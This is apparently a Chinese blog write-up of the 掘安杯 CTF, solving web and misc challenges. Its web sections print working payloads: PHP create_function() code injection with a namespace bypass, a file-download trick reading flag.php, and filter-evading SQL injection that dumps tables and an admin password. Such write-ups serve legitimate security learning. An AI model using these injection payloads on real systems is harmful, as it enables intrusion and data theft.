掘安杯 writeup

发表于 | 分类于
掘安杯ctf复现,现已复现web签到、not_easy、下载下载、曲折的人生、so_easy、这是什么玩意儿、真的不是图片、你对我网站做了什么?

web

web签到

打开flag在这里的链接,是404界面
使用bp抓包
1
进行base64解密,得flag: jactf{jasafe110qweasdzxc}

not_easy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
error_reporting(0);
if(isset($_GET['action'])) {
    $action = $_GET['action'];
}

if(isset($_GET['action'])){
    $arg = $_GET['arg'];
}

if(preg_match('/^[a-z0-9_]*$/isD', $action)){
    show_source(__FILE__);
} else {
    $action($arg,'');
}

此题是create_function()代码注入的题目,create_function()代码注入学习链接https://blog.51cto.com/lovexm/1743442

简单介绍create_function()代码注入

  1. 函数介绍
    create_function(string $args, string $code);
    $args : 变量部分 、 $code : 方法代码部分
    demo:

    1
    create_function('$a, $b', 'echo $a\*$b');

    等价于:

    1
    2
    3
    function fun($a,$b){
    	echo $a\*$b;
    }

  2. 代码注入利用
    测试环境版本:
    apache +php 5.2、apache +php 5.3
    有问题代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    <?php
    $id=$_GET['id'];
    $str2='echo  '.$a.'test'.$id.";";
    echo $str2;
    echo "<br/>";
    echo "==============================";
    echo "<br/>";
    $f1 = create_function('$a',$str2);
    echo "<br/>";
    echo "==============================";
    ?>

    利用方法://index.php?id=2;}phpinfo();/*
    实现原理:id=2;}phpinfo();/*
    执行函数为:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    源代码:
    function fT($a) {
      echo "test".$a;
    }

    注入后代码:
    function fT($a) {
      echo "test";}
      phpinfo();/*;//此处为注入代码。
    }

本题需要绕过对$action参数的正则过滤,
在字母数字下划线都被过滤的情况下调用create_function(),思路是在开头或结尾绕过正则
可以使用bp进行fuzz发现在函数开头加上字符\(%5c)可以绕过,原因涉及到了php的全局命名空间,\create_function就是调用全局的create_function函数。

  1. 利用create_function()代码注入执行命令
    http://120.79.1.69:10006/?action=%5ccreate_function&arg=){}phpinfo();//
    2

  2. 继续执行
    http://120.79.1.69:10006/?action=%5ccreate_function&arg=){}var_dump(scandir('./'));//
    3

  3. 最后执行
    http://120.79.1.69:10006/?action=%5ccreate_function&arg=){}var_dump(file('Th1s_1S_F1a9_Hav3_Fun'));//
    4

最终可得flag:jactf{c795359da56ae38ec9132eaad24733fc}

下载下载

点击链接下载了一个flag.txt,但是并没有什么用
查看源代码

6

可以将这个flag.php下载下来http://120.79.1.69:10002/index.php?file=flag.php
打开文件,在末尾可以发现:

1
2
$key="MyCTF";
$flag="o6lziae0xtaqoqCtmWqcaZuZfrd5pbI=";//encrypt($flag,$key)

放在本地进行decrypt()调用

5

最终可得:myCTF{cssohw456954GUEB}

曲折的人生

8

由此可知存在sql注入,同时可知过滤了or 和空格,测试后可知还过滤了union,select
可使用双写绕过or,union,select的过滤,使用/**/绕过空格过滤

7

可知回显位是2,然后进行爆库:

1
username=-2%27/**/ununionion/**/sselectelect/**/1,database(),3#&password=123&code=123

9

爆表名:

1
username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()),3#&password=123&code=123

10

爆列名:

1
username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='admin'),3#&password=123&code=123

11

爆内容:

1
username=-2%27/**/ununionion/**/sselectelect/**/1,(seselectlect/**/passwoorrd/**/from/**/xiaowei.admin),3#&password=123&code=123

1213

usernaem: goodboy_g-60Hellowoorr (注意or需要双写)
password: ajahas&&*44askldajaj
最终:
14

接下来就是编写计算验证码的脚本了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#-*- encoding: utf-8 -*-
#在python3 下运行

import requests
import re

username = 'goodboy_g-60Hellowoor'
password = 'ajahas&&\*44askldajaj'

get_url = 'http://120.79.1.69:10005/index.php'
post_url = get_url + '?check'

session = requests.session()
get = session.get(get_url)
get.encoding = 'utf-8'
html = get.text

#print(html)

str = re.compile(r'[X/]*[(0-9\+\-]+[)]+').findall(html)
#print(str)
num = ''
for i in str:
        num += i
num = re.sub('(','(',num)
num = re.sub(')', ')',num)
num = re.sub('X', '*', num)
print(num)
if num:
        vcode = int(eval(num))
        print('num不为空')
else:
        print('num为空')

post = session.post(post_url, data={'uaername': username, 'password': password, 'code': vcode})
post.encoding = 'utf-8'
print(post.text)

15

可以得到一个压缩包的下载链接,以及解压密码

16

访问http://120.79.1.69:10005/sss88ioiern.gdsgj.zip下载压缩包并解压
有一个需要解压密码的flag.zip和一个Form1.txt
审计Form1.txt中的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
Private Function getPassword(ByVal str As String) As String


    Dim reString As String
    
    Dim i As Integer
    i = 1
    
    
    While (i <= Len(str))
    
     reString = reString & Mid(str, i, 1)
     i = i + (i Mod 5)
    
    
    Wend
    

    getPassword = reString

End Function



Private Sub Command1_Click()

   Dim Dictionary As String
    
   Dictionary = "VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU="
   
   Dim password As String
   
   password = getPassword(Dictionary)


   Dim psw As String
   
   psw = Text1.Text
   

   If (psw = password) Then
   
    MsgBox "The password is correct!", vbOKOnly, "密码正确"
    
    Text1.Text = "Password for next pass : " & getPassword(password)
       
   Else
   
    MsgBox "PasswordFail!", vbOKOnly, "密码错误"
    
      
   End If
   
      

End Sub

将Form1.txt中的伪代码进行输出:

1
2
3
4
5
6
7
8
9
10
11
dict="VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU="
def getpwd(str):
    restr=""
    i=1
    while i<=len(str):
        restr = restr+(str[i-1:i])
        i=i+(i%5)
    return restr
passwd=getpwd(dict)
pw=getpwd(passwd)
print(pw)

运行得解压密码:
VmH0wW3DZalBnmmSalV1SYSGRr1r3jVYcFrHWkUUlhljkFzCbXaEKyaVJymT1FlVTVskVWhGtonaGU2WWGhVXYol1WVI1F2odFuk
将解压的flag.png修改后缀名为flag.txt,即可查看flag
最终可得:flag{Good luck!}

misc

so_easy

jactf_7e05c6db9b3bb2171be76c336a50d150.exe使用winhex或记事本打开

1
Kf3kAFJMri71zQLADjAuHAPwXtTCSwRrcF9oeig4tZwqpur8i88LoJU1v8LcaKt2WutLqtRp988veY5FfyMwqs3zZiNvhqb6zFTHpn3fSmFuaogagzdqEuq5GiynnGfL7hQC9fbEKJV4MxqLYd9F6LvweLJ3cEaRfMjde2bvZUfgvgXDkCx8g7DwHrH7Mp4usUdB1YmgeuyKP1Z6GARYaWBDzunJ6dePDtddCkD2G11eF9E9vJooAPrZ7U3s1xeW1UYabFmLazHs5QkvthXeJqZewHDXEUCrBnnoYXZCbHBHfP9sD6NAgS3Gr6ZT6h4HNK9qkttjxk6SVF1ABfPmRsLCQXr6C6vnWq9YR1fk9hHCiW4sFiKPe2QR24h9dFFfjV4Pk3h6LawqT8me4rE1vJTBnMnhm4caXqGNhxz74GY1WmzUfWyrXmN3K1PvkhzARnFytP8ot5FsNzL3uHvJguE3mbKBuGdPQuCBk27D2CwXDtBdhcHXc9mATg89xtnmk2Wjro9PVvZqaxtWzMWsi1d91fu7RFRRJcJQ61ScaxyX9bop485xMszPSDVL1sxDHk5aCzJ6isswjntmqdix4WogfDQwRHwQyj6cBhkwdo52aV76t9Yw6sqGgi6ra6FyPp2ygPtoJrcpgJCXm9P23VoE9XEopJfr7MEpfoVvLon9xuSQ1JnyHKYSFcJoU5RX7erNWhY3bp4wUACr9JGRcGXrcGs9JjKqVnVGamNUc97xtrsbTYmMJYXp9HwPMFT7YQww9R8d3gE39JmhM214fr9ESZWzWac1nbhYdvbPS9edLe5wkjzNvGrmzctSfXU7ciGgMF8gAjsrMwBXQ9Kj9oLqVCfSXZHwBXcNthyjQt5hYAaRZnfxZLdoFXRmSByPSZjKrWa7K8sKNebbQTu1cEQ4f3rEuPFgpunELkrm8j7gcJyJmARdkiD5fqmgW9R2vNB9kXPNBMJqCham2kkfYe2NwteGzpiB3EsNhJiEk4GSQXEJ43FSW23rwYUaaq9E3LSL2jcBhndTbdcAvp3HZufRtvVKHxYL3tgnLHKZtPKRgZez7WGUR2LgJwQJ48dA8zcoyWovcDq2Mkz43JPJLkAXhtaFaAdvXpV3YMRNcGwCy6BftzA2vewJNroERmNHgLzJFa4LqnKB91iN2wcm6vF28YFwZjepujaZiEMqdUcEdiyG6M7cC2Pot9SXJB6Hzd16H9WhSE9Qs8RFy6AMFbxvvTpW6CYhNMdSr4kBzCB1iTb8jPHK6vU4aMscD14kamgYnsKdxqpiR9AFSwzWmDQnXLWPumWAwpbX7STv8pGWMD9uKxEJ9VUaFYwM9iZsZj7ifo8qdvvqqakA4paZrjaM2mXk2iHH3tpJ1gWLVQ4ttkSBqrcVPvoCRwa7WETN2eYWLMYsvdzMJUC5yPitV6TJmYuJv5CWY4Vd4xXe38itZmDAthPupY7fF61ATgmxmMbpJU7bHZdNwC5kN2GS5BC6TKqTfjtE4GvUYUeueGtRpgMJJvJHrika7r389EcRWmnibj3iyxyWRED4Pe7EUYBQdpXZ5Qz9U3hJyEXTjtFh5884rgNZci8trShxHkXR3pny1VgTVnGKZ2FKJKK6iHWyLZtpuGkTybkUJq2nxAPPg5mSeuGEfxhzf8qq6jSSgCPRrLXcHJdn7werTv4jprM6Yc8SxCuUe7TX8bqMeYYaYpKnRrN84k4S4TBtRN8hv2CLbANkVGXMXxt3gi8Y6WXnHqbPigW1qbe2YhVArsHkx8MPyAnU9g1WddhRZSkNdpuvwgKk1A6jDaS3DXpG7eLFmLX2M8Lwn7UUmafwUKC3G18j2yitnjTDZLQUjdaxkQB2nev9DDKgXkxGpBexJpCTHhicsLfnTYsXUZ13b3k3sZyULsRJ4J4M4Fff4q1B6a1dTCBSKA4ftKyArVRTXMJCN7B93X74V6hwAYtuayjtv4evTLhuM2EpR8waQy6L3fDoFAZbdgjCUuuf2spd8eriBBCCentpeDH5B18BcbTwjF93HmBHehBCD59cdZECibfojGheM8nyGnLnGNKp3MUkLtrBQvefWJkK64BUZoy9Hrvp5SxbSgigzkfn9BWVZASNHpUHoY2LwFYqyKCGrE9mzESb2e8iNfGcrxntHU2eVSANCNqQhF4Cyjt1ce82vL5rDyeH2ZJtTrsxWBKKNnMhkGxsQyUWxrHQKp5qpow7sotSN8WxyVKYfyZefhj94ct7pQTmNxwTySesMXhbLfXyC4t56iuZGsSL4Ekhk1tAa3vCeBBRmhfHf8eFBK946YSpARtkn6drbyCBJDqaHsZULx4YyHij3JYiDtREQwHZVZX1cc5btqjYqYKpiu126GHLRHxLxWEgbNZHBc54s6JGLP4dgJUJDdF9uL865bkQ8yvydzhv2DEHUshL5esRBsHWJfgE9hNyZ46FjpUm5A9NtPVYnzSg698gWxRc4MW3yxhQ4t3SmmTxcXWhkE5Az5AuDsb3ZzLRnhZr7vGUwz8p5Nz7wpkdPBL1s7GZKfrJjQAuq1VTy6xXQ5j4aQZvmN1oTNx1bofo3ghDKWYi5JNkiePKu7RuHfw2Ee2uYAd1BEhiTTuRvEm8VGVVNzirhJxW7sV61utZzQHyqbE91MxNqfmHYWZLCics8pbsXyE5iqSvhCm8CTjkknmuiRqNYcUknNnK4bM33cdk9rSpG3v91RWdjC7fAqS8Jh9WipcLTsjBEd89rzg7TShaRnzbQAi5YcEL2oJ16L4knoo2iPv63MCuYPMNjUtCCbZe6uPvVNkRfXCCusXNe5YYms1KarSC7LfcDqAdoXEfu835kYrrrxx9yX1B86GewP1ACBwJcJwkHJKdN7athAkoZAcjjkoQdUxvwTn111GYUgHAkgn3oeFbz6RiWVG5afkd6LpNVoPpzLWBRrhoFXoTPwrj31S2Y1SmnGeC35FuHCrh1Fb2TmH4GaD2DfzKwwvTWTwHPDzffDh2p39C9K7w1XQ19Nx73EXuMRU4gFHXtZkt1ddmpz3kB5Kw91dWVh1QySLHJLSyA3NXxGGCeFRZ5AnpxyqAbVQMjqSZjttWZ9jrnC3J9SMHio9QqcxdSCMdZK4HQjJPMrTb8UvT3BHFPJsDvZZcbyv1RSAA92ixvDWo4JF42CSHuPS1RNpRh5MdT29A37urWPB4Qvc5zbPdhrenf2joKFxm4MXc16bWG7Z1fbjbDVqnHRZX4VUeTdLesYsjfmFm7HGLBH7nMrtuU9iEE7xDmCG4Ycg8PAEftDS9iNKqQgDL5Rb4JaANtJJezAyUupo4k2FNPPJk55gbLc8KT6EPZWXdY7BCtf6AJBRXb3bFYQW7u91ysEzD53ToXD4w4zr2YdPotnqo7fTMxoZDE3Tdcd6meejFLLz7NmYddkhvKX9RovXqmrTNLLyu3M3V1vnJ6TAnEHdKjMgW9qsnyUpBZLorv1eG32ij9ELXd7YscMiXxL7HbXukBZ47BKDknQ7a1JhWMgtvkoFd6jtMrKmLDfSEbrMancxb4aFHBWi8PuwaEWePbCvZsgzD9qjLcRMj1PVMwSzwpgijX88J5reEh6prYjg5BnSnf7eP7trkW1uvbVuCsbbwazMartTRVa3dTqV8ELcLqwrjpEPxWMSM3yBCxETGeqnJBLTjvvC8WUP97H8xpE3w7kNLHxqZs8xX6ADM9DbkCzHfvnzbgt4kZsPe3oTUnRiGnnwHAV5mqUfy2A4CCL8dPYh3B96HZK63YqzgZJuXH2Mmwvthd6pqkF6mi7rvJyjJm3pMjiRyo7VvsKuNR2ShASgECtXNo2N2WL1VkKNfH7usYJfH9UQPtYwngaBUvsaqaJSmqFF35bqm1sXi4JZSjXSp3z9BsD92xZm2gHnhy1EECakPH38WXTcaf6G1kM2ErVW2FDJxkKGV3tejaFaNfxvUdqaQtLUDKZc7qyiGU4bdLLinuDYsfXMTpPiPxJUiJMLVn5kqUcXVtgU6xZ4zu63AmAD3XeDXf67q5TUCXQp1HGpQX3kZqwxeq2psusi1PRWKQJ35QgrE7c3Rco1mgRYvXK4TfLQqRUPyhNu5tRuJDZQxFQVydjuqym97jZj6TkjQvQE86nyntSZPKwgVcLFkKFnFt3mdQk2PMB14jB4H2t99oFX1SoeFUFrVpjitqFp9yWkTe1WCGP9pCtvB7s235rfosio96yLaL3dR8MDVcKfoB9CF2ot4oXQaz5RYxrwrK3rwM2MmFBgd7ZGwsgViASTYh8qbsQjRTCwr5Ln3NvHH3rHPULCG3qSvAeKfeb2LRFFiQUgkrmPHCeT5XFWLidQEwk7FPQ1QeL7Vvn1Q7v2AcJxoS28min2GytYPbQLubqczy9T6CZhLbBGJqzqa7vR3GbR2fMcWtyH1riFtEPssa7JC3UZYRwPoEcRR341ck3py7GTB7ADRhWNSX1Cgkm5y9s5kgjje1pwoMeXcqdzcaFQ4mcrPV1A96qWBzZ9s4TinT6tq6vJLqn63vyJS2oGFMJziEcdNHDtCrJpKoFt5Bw62kTigs7Ck8jAT5zMTgr6zgdwqpCrhftxS8H53hj9LqHDMz3J7WCKH3w1GCrHrwfYDpQXPyawCrV3MZxyajF6i5qHcWumsq1yubM1Y5pvU6cALL7iN6CKK9y135u1h8SfcoRqhJhzqLMLtUHaHLMiHRdXeVBrE9XhpXEE92xKLTyAzEHdWPU4RrpxBVqeQnyScRXKmWKd9WipCsdQMFq6R7d5B2QV4axNyRgHBDGEYU2csx5YqG9ZW37gGw2ov26DKMdi63LuBhtYcbXAXWErxgMyJaU1vyy2w3pvLEeuA3qVBikfpAgkbPEHTLE7Pkc11zLGWw99MtRsVJ6SL4ZneVu8xGt86iQcigtGuQQdV3BdhePMvvhQH7YmPfjVGR4uesxRmdW596nJbutbGK5bLtN7Cao7jagU6RkxWHFGYHqpcKGmVxQD3gUKTiAoxx53u3cRpxUeZeAi4QDYjMSk1Jq8ieDBuFTyEUEaMc45E8YHxm4VUfAto736znUX8Aptooh7V9rVdddqxQhvAtR52z2Ke9CNPEuSPtVQFz6GfPnGzdZwXBeKmp453eMMegqShP9RvhnYupthkbjUcLDZoLKgKbhL9FyG9dXffbSacqkyrNEWBeEmBeRb6VMj6W4F8U62a5Z4HYnbCs6HcUSWjoQZkX7iaG61mowqk3Ky4DMqkPMizg4Rjf2oZLFkTFrsPA3aUtKR5gUepdY6tDqQcGrdtL7CYosPysWoWQxLu2puohtPj8Rf3e3NZkfjrFNQ8BLxTqJ69fXGKgKmxMFKE5DonnPKvMFytzcDGbtoE39z4GeYKboQyY5oZNE8ZWc3MZH9ugQZFTAi5eZ8ZZb5A2nUYYEuvkweph6y96fD9wnH7ifP8a74WoJwFnoZTLYskCZRePEw1cm3Ymx1kXT78rgPMvDgvuhuQP52DmVDFKBfX4X3UYMKGe9zgAfnXmN3eMQmZCWzvo3yJ5TciDAATm1v78zgWZewDvohMpsBGHdmYb5kvzRRHkEb81mbg1zhqAtNQyYuHCrtJ4E2SAHaBTx4qCNRB1Deri5S7tvc2A2taWtLopzfmAT7oevmtoBorXbNkv8uTCxBHfw3n6fq9SJVWM5M1ptTxHNwZBVN5fWShAYxURMf7ahhe1GDFNQwJs8X4nDdRTT7FBXiHzqVxTEiPBAEucLM68WQ3ipASGTEA4qoYSgKSF1Y1LjPCFQbhEVag5eozfp5EjZEsLaWRr43VqP4vLaqasMrM8WK32kuXAtStG8G5ecxxDwHfiPh3TtQB8BUayqjf2zWRRT9d34uJiuQ1ijUiRJW2mKMeDDTW2MSxKJU7V7CF6JhAZWE3hVrSb2JVmAwAaucneEr6RUdP7SHjnxhgXLvacjA9TEouD6TYPCo8ho6kLF7Ef2sZiurvE6yXHgPd5kMfrmrRr3BKvdMySy7BBrRYvQa1Ppi6eEJyoh5ZvRMBAwgNVVFohD2dQUc2P4xfwhjEG1X4juen8nu4TakeijuB8mmUgg5cj2sQ7WTHTiuekEhkppVWAruRdZBSPSkZudYuMvWnQxJD3tVghnQxz3Tt284wkyzzc8vPSSeQTM49KrpUL8bJ6biujc6jb4W7d6FBi5tzrB4Hczz7iJwn7Wzpwd1rSkNVMx8XC7VhYJyusJ6o83ZmVKk1TV9TrNm7eKdncwU4kCx6ZYP1PJKJFympNkG3UMbWjgei4ASyU5YrDAymA6y93tpw7eonKC57A9nJDiHb5tRhsjAUB5aLB4d7iJfownJvhcZJiCLFtzM3yWsXreX1w3fibsTb1BTU7cTK6dDFWSuFz5vZHMRfMSnzxfXNQ8cbBmo4CAAwdf28KEqm7o4zyBfqjZo3zndgmrQAnfRpmX3joqGB7XCjTm1B3U5xox12p9P3uhQxjVbVdbKps8VYdNaSQ258L5uPLLnP6aQjS7eumACbVGRB6aVqLPcmKQURaP8yVMPLzQ3CKuVAz6Q8aQRFMWvbbJ9MSPnbgnQFC2w4G5CCjd3e7bPiuhLcC8LJoSL5MjGpHdsh7kysE6JBsm8psopY1x45Hhf9eHMR8YDC6cTBnEgAs4eKenmN6WjmH79MxbEFyzd5yLoLLTzAT5viazQbC87ky1Efox3HiGCj4BcLCzy8RXBEAzcWccKHTFZCgz5FsPM1mkub2hWdv9ctBHJk4u7W62eZHj9Te2JpHjde3LvPPbPU19SjKMuu7DGnCV7pC8HFhRpQ4y7622mxogu3dBSyNjryn9dkBf5L35hTbDbxF5JjEZFaCJFzNaeGYL16YEZLC6EouckjzBFBJrYGyQsh1RKVXNmHXGbcKz84J8zTD2TSGGrbAZXVBYJuMjUbrd59dvH4NeTSN1bEAw9Zzu2ygQTPvLrLRycrpPw9jw5vnxbDh5QXMnNGkWcsie7QtLoQnyXhfVqK5SVDKShQDk6DxzWAJM6EAAaf9oyg4QkRDSy8RA4NYeJPpVAPy5K3PJyHjFvJmRXJLQJKnU5RkRkSmF1SjhdoKZKSNMTrzCXVLGFCG67KSRcmR9mCeqQ37w1nMHVWW9RzMNBchSL2tX72Ms8AXPuG8zZC4N38pudRciCowkcS1AAz1ofvXZk49AtftYfhPbMJs3agh53VWKGwx2dHrgPvA7XPWoUKFzPi4zEzHZeL59CcXRoL4q38kXGGuAnG8S8gdkB8AXWGWQwkFbhKJLtGcSHXh9Ev13yfB1GP78QYxbiWc7iCYNVQJkUJd4yY8XentoyvL4mAde4T7mbn7KJhd8fQjMug2N148NiWz9zotaF9APx9VfXYLAfwNN8UZnLdcNDG7Tx3Hr1YcSCLLFVJcJQNQWewicBqtRwxNYpu7MyjLUB34jpS8LM4L5xaKEi4617FpegAehsNoPJK4mpiCAP7CotYSxEMFqeBuxCtCfLapGNw9gzAbUfy1MGRsQB5ZkgsbatW4iaXFq54ozeguejVHyVr71pZGqxa6mVXFsZGZBuVA6DEXomdSNwBpgywpRGLStZkHNhYcn4EpVXPCRw39Syx8a36dk3B9AZCv8rAjXgGJ7qNkHeNr6DMrmjPMagwM7RSZThkQGu6ZgnjqfhvtUta7qqzhYt4eu49HDeeiAsq5uRtRVjyucdA31MxNi7tC1DAHT1cMW7mJbxjKT22STt6y84TEQiLr3cUZytPJQLsC8WQyatDWSRutsdrqgAhV5tMztBz9nsTa73mpjaWdxyRrY2RHUDcCRvBies2d8kEXvn9mMoxErkyM2gXEXH4rJ1Jd5jFKW5gnQbgjjNTQRm8jHDmGywB3cHmJ6LUWcqErmWC6sLnfrcQw1t4PBHPEhiAnskFViXPPAHkAbLMksBq8Sf67Uc1mEuVovEESozmViKvBGnuZCvBcgG8h5SuWaU1MPzeFNPMRjEk2qw2NWCCw3LUJRyyF5sjSWSsq5Q6kSAa9Z4VqLPQuDwqe9myw9N

base解码,base16,32,64都不行,使用base58时:

17

解出来看开头可以发现data:image/bmp;base64,数据格式为图片,使用base64编码,那么思路就是base64转图片

18

扫描图片二维码
最终可得:jactf{base58_base64_flag_very_easy}

这是什么玩意儿

打开文件后将内容进行Quoted-Printable解码,可得佛语:

1
佛曰:梵僧奢楞奢吉若奢不帝冥夜是缽朋缽真特俱上罰能皤室阿諳明一切呐除梵姪缽婆呐亦參侄呼皤世哆特哆故勝諳爍謹智皤參孕逝諳謹漫死即侄除哆逝侄是奢喝礙豆諳楞無俱者哆度者。諳真冥訶侄勝竟藝奢不伊皤謹涅孕無他羅大得闍哆喝耶僧無羯滅除利缽多梵夷梵栗缽者孕諳盧皤三罰寫老梵耶室帝梵寫羯數梵盡侄栗侄藐俱世諳上諳姪數室婆罰槃奢訶哆多逝藐道梵楞梵南侄迦呐知朋楞侄離呐沙呐智遮大室神冥輸殿缽槃梵怛恐舍知皤迦奢般諳爍寫漫伊俱栗哆他亦缽楞怛冥呼切俱菩舍呐實栗奢波摩諳道缽瑟哆實皤爍勝薩罰諸奢般諦罰明缽諦尼哆楞佛俱醯諳滅度哆所槃姪麼所恐諳他侄寫瑟侄所得隸哆闍呐提盧冥咒奢曰呐沙怯般南怯地缽喝冥想呐盧罰謹呼跋缽上娑諦死侄迦

再进行与佛论禅解密

1
公正友善自由公正民主公正和谐法治自由公正公正法治友善平等公正爱国公正平等法治爱国公正敬业公正友善爱国平等诚信平等法治敬业法治平等公正公正公正诚信平等平等友善敬业法治民主法治富强法治友善法治

最后是社会主义价值观解码
最终可得:jactf{hexin_yufo_qp}

真的不是图片

使用binwalk,发现有一个zip

20

但是使用foremost分离并没有分离出.zip文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
补充 zip伪加密:

zip文件由三部分组成:
压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 

压缩源文件数据区: 
头文件标记:50 4B 03 04 (0x04034b50)
解压文件所需pkware版本: 14 00
全局方式位标记(有无加密): 00 00
压缩方式: 08 00
 最后修改文件时间             2 bytes
 最后修改文件日期             2 bytes
 CRC-32校验                  4 bytes
 压缩后尺寸                  4 bytes
 未压缩尺寸                  4 bytes
 文件名长度                  2 bytes
  扩展记录长度                2 bytes
  文件名                     (不定长度)
  扩展字段                   (不定长度)
  ……

压缩源文件目录区: 
目录中文件文件头标记: 50 4B 01 02 (0x02014b50)
解压文件所需 pkware 版本: 14 00
全局方式位标记(有无加密,这个更改这里进行伪加密,改为09 00打开就会提示有密码了): 00 00
……

压缩源文件目录结束标志: 
目录结束标记: 50 4B 05 06
……

winhex打开图片发现少了zip文件头,寻找压缩源文件数据区的标志(在数据区寻找14000000)

22

发现头文件标记:50 4B 03 04被替换成了6a613636也就是ja66(解压密码)

21

将图片修改之后再次进行binwalk分析和foremost提取

23

解压subject.zip时需要密码,而密码就是前面的ja66,最后可以得到很多文件夹,每个文件夹里都有一个内容为一个字符的文本
编写脚本:

1
2
3
4
5
6
7
8
import base64
flag=''
for i in range(32):
    f = open('./subject/' + str(i) +'/' + str(i) + '.txt','r')
    flag += f.read()

flag = base64.b64decode(flag)
print(flag)

最终可得:jactf{64se64_1s_50_c001}

你对我网站做了什么?

这是一道流量分析题,打开shell.pcap数据包,直接查看HTTP流量包
在最后的POST请求中可以发现catflag.php文件,以及它的返回包中有一串加密的字符

24

25

使用HTTP追踪流,查看源码

26

27

直接编写php代码进行逆转

28

最终可得:flag{U_f1nd_Me!}